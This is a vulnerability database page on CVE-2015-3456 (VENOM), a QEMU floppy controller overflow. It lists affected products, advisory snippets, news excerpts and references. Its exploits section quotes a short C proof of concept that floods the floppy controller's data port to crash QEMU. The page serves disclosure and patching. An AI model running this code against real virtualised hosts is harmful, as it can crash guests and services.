
CVE-2015-3456

Published: 13/05/2015 Updated: 07/11/2023
CVSS v2 Base Score: 7.7 | Impact Score: 10 | Exploitability Score: 5.1
VMScore: 776
Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

The Floppy Disk Controller (FDC) in QEMU, as used in Xen 4.5.x and previous versions and KVM, allows local guest users to cause a denial of service (out-of-bounds write and guest crash) or possibly execute arbitrary code via the (1) FD_CMD_READ_ID, (2) FD_CMD_DRIVE_SPECIFICATION_COMMAND, or other unspecified commands, aka VENOM.

Vulnerable Products

qemu qemu

redhat openstack 4.0

redhat enterprise linux 7.0

redhat enterprise linux 6.0

redhat openstack 5.0

redhat openstack 7.0

redhat enterprise virtualization 3.0

redhat enterprise linux 5

xen xen 4.5.0

redhat openstack 6.0

Vendor Advisories

Several security issues were fixed in QEMU ...
Debian Bug report logs - #785424 virtualbox: CVE-2015-3456: floppy driver host code execution Package: src:virtualbox; Maintainer for src:virtualbox is Debian Virtualbox Team <team+debian-virtualbox@tracker.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org> Date: Sat, 16 May 2015 03:57:02 UTC Severity ...
Debian Bug report logs - #781250 qemu: CVE-2014-9718 CVE-2015-1779 Package: src:qemu; Maintainer for src:qemu is Debian QEMU Team <pkg-qemu-devel@lists.alioth.debian.org>; Reported by: Moritz Muehlenhoff <jmm@debian.org> Date: Thu, 26 Mar 2015 13:48:13 UTC Severity: important Tags: confirmed, security, upstream Fixe ...
Jason Geffner discovered a buffer overflow in the emulated floppy disk drive, resulting in the potential execution of arbitrary code. This only affects HVM guests. For the oldstable distribution (wheezy), this problem has been fixed in version 4.1.4-3+deb7u6. The stable distribution (jessie) is already fixed through the qemu update provided as DSA- ...
Jason Geffner discovered a buffer overflow in the emulated floppy disk drive, resulting in potential privilege escalation. For the oldstable distribution (wheezy), this problem has been fixed in version 4.1.18-dfsg-2+deb7u5. For the stable distribution (jessie), this problem has been fixed in version 4.3.18-dfsg-3+deb8u2. For the unstable distribut ...
Several vulnerabilities were discovered in the qemu virtualisation solution: CVE-2014-9718 It was discovered that the IDE controller emulation is susceptible to denial of service. CVE-2015-1779 Daniel P. Berrange discovered a denial of service vulnerability in the VNC web socket decoder. CVE-2015-2756 Jan Beulich discovered tha ...

Exploits

// Source: marc.info/?l=oss-security&m=143155206320935&w=2
// Crash proof of concept from the oss-security posting: it only crashes the guest's QEMU.
#include <sys/io.h>          /* iopl(), outb() */
#define FIFO 0x3f5           /* FDC data FIFO I/O port */
int main() {
    int i;
    iopl(3);                 /* raise the I/O privilege level so outb() may touch the FDC ports */
    outb(0x0a, FIFO);        /* READ ID */
    for (i = 0; i < 10000000; i++)
        outb(0x42, FIFO);    /* push */
    return 0;
}

Github Repositories

Experiments related to CVE-2015-3456

Experiments related to CVE-2015-3456. There is:
exploit/ is an "exploit" (it just crashes QEMU).
mock/ contains a stripped-down version of QEMU; only the vulnerability remains.
patch/ contains a program to patch a running instance of QEMU. The main point is to not need debug symbols, nor the original executable on disk. Therefore, some information has to be provided

just some code fragments

TODO github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet github.com/github/linguist/blob/master/lib/linguist/languages.yml (highlighting languages) test WebDAV and Internet forwarding (install python-webdav) read www.javac.info/closures-v05.html sometime www.scheissewasschenkichmutti.de/ de.wikipedia.org/wiki/Owncloud ww

Vuls verification environment

laputa. What is this? laputa is a Docker environment for trying out and verifying the features of vuls. It sets up various OSes: centos 7,8, debian 10, ubuntu 18. Normally vulsctl is very convenient, but since this is intended for use while developing vuls, each tool is installed into the local environment with make install. Also,

Fixing Security of VM

elysiumVM Fixing Security of VM Playing against VENOM rootkit on VMs Take a look at these security bugs: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3456 Problem: Floppy Disk Buffer - yep 30-year-old tech is back It's going to take a while More Info: venom.crowdstrike.com/ security.stackexchange.com/questions/3056/how-secure-are-virtual-mach

NDSS 2020 - HYPER-CUBE: High-Dimensional Hypervisor Fuzzing

HYPER-CUBE: High-Dimensional Hypervisor Fuzzing. Hyper-Cube is a black-box fuzzer designed specifically to test x86 hypervisors. Our approach is based on a custom operating system that implements a custom bytecode interpreter to enable fuzzing of emulated hypervisor components. The OS is tailored to work with most x86 hypervisors that support either BIOS or 32-bit UEFI boot

Recent Articles

Miscreants tripled output of proof of concept exploits in 2015
The Register • John Leyden • 05 May 2016

Pastebin is for old hats. Cool black hats use Twitter now

Hackers collectively tripled the production of Proof-of-Concept exploits last year, according to a new study out on Thursday. Researchers and black hats develop proof-of-concept (PoC) exploits for research or demonstration purposes. These PoCs are developed for various reasons – to demonstrate that software is vulnerable, force a company to develop a critical patch, showcase skills, or, in the most malicious cases, claim ownership of a working exploit that can run on real-world targets.

Oracle releases antidote for VENOM vulnerability
The Register • Darren Pauli • 19 May 2015

Patch but don't panic

Oracle has released patches for its virtualisation software to crimp the VENOM vulnerability that allows attackers to break out of virtual machines to attack hosts. The company follows a host of others including KVM and Xen which have patched the buffer overflow bug. VMware, Microsoft, and Bochs are immune to the problem. Researcher Jason Geffner of threat intelligence outfit Crowdstrike quietly tipped off vendors including Oracle to VENOM (Virtualised Environment Neglected Operations Manipulati...

VENOM virtual vuln proves less poisonous than first feared
The Register • John Leyden • 14 May 2015

Potential deleterious effects more like a snakebite* than a snake bite

Analysis A newly discovered vulnerability in many popular virtual machine platforms is serious, but nowhere near as bad as last year’s Heartbleed vulnerability, according to security experts. Dubbed VENOM (Virtualized Environment Neglected Operations Manipulation), the zero-day flaw takes advantage of the “virtual floppy disk controller” and potentially allows attackers to escape out of the virtual machine and execute malicious code on its host. CrowdStrike, the security intelligence firm ...

References

CWE-119
http://rhn.redhat.com/errata/RHSA-2015-1002.html
http://rhn.redhat.com/errata/RHSA-2015-1000.html
http://rhn.redhat.com/errata/RHSA-2015-0999.html
http://rhn.redhat.com/errata/RHSA-2015-0998.html
http://xenbits.xen.org/xsa/advisory-133.html
http://rhn.redhat.com/errata/RHSA-2015-1001.html
https://access.redhat.com/articles/1444903
http://rhn.redhat.com/errata/RHSA-2015-1003.html
https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/
http://venom.crowdstrike.com/
http://rhn.redhat.com/errata/RHSA-2015-1004.html
https://www.suse.com/security/cve/CVE-2015-3456.html
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00021.html
http://www.debian.org/security/2015/dsa-3274
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00019.html
http://marc.info/?l=bugtraq&m=143229451215900&w=2
http://www.securityfocus.com/bid/74640
https://kc.mcafee.com/corporate/index?page=content&id=SB10118
http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158072.html
http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
http://www.debian.org/security/2015/dsa-3259
http://www.ubuntu.com/usn/USN-2608-1
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00042.html
https://support.lenovo.com/us/en/product_security/venom
http://marc.info/?l=bugtraq&m=143387998230996&w=2
http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-438937.htm
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10693
https://bto.bluecoat.com/security-advisory/sa95
http://www.fortiguard.com/advisory/2015-05-19-cve-2015-3456-venom-vulnerability
http://support.citrix.com/article/CTX201078
http://lists.opensuse.org/opensuse-updates/2015-08/msg00021.html
https://www.exploit-db.com/exploits/37053/
http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00001.html
http://www.securitytracker.com/id/1032311
http://www.securitytracker.com/id/1032306
http://www.debian.org/security/2015/dsa-3262
http://rhn.redhat.com/errata/RHSA-2015-1011.html
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00018.html
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00014.html
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00013.html
http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00009.html
https://kb.juniper.net/JSA10783
https://security.gentoo.org/glsa/201612-27
https://security.gentoo.org/glsa/201604-03
https://security.gentoo.org/glsa/201602-01
http://www.securitytracker.com/id/1032917
https://www.arista.com/en/support/advisories-notices/security-advisories/1128-security-advisory-10
http://git.qemu.org/?p=qemu.git%3Ba=commitdiff%3Bh=e907746266721f305d67bc0718795fedee2e824c
https://usn.ubuntu.com/2608-1/
https://nvd.nist.gov